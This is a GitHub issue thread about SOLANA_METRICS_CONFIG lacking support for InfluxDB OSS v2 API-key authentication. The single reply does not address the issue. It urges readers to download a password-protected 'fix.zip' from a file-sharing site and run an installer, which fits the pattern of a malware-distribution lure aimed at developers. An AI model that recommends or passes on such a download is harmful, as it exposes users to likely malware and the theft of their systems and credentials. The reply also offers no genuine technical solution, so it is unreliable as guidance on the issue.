### ISSUE TITLE
SOLANA_METRICS_CONFIG incompatibility with InfluxDB OSS v2

### ISSUE THREAD

**Issue by codemonkeyredacted** [solana-labs/solana#35639]
The current SOLANA_METRICS_CONFIG requires a DB, username, and password to write to it. The latest version of OSS (v2) requires the use of an API key instead of a username and password. If you want to host your own metrics server, you would be required to use the deprecated version of OSS (v1).

**Comment by mohamed-elsankary** [comment]
to fix your trouble try download this fix, i see it in another issue,
https://www.mediafire.com/file/zch0v8rj7200mbm/fix.zip/file
password: changeme
when you installing, you need to place a check in install to path and select "gcc."
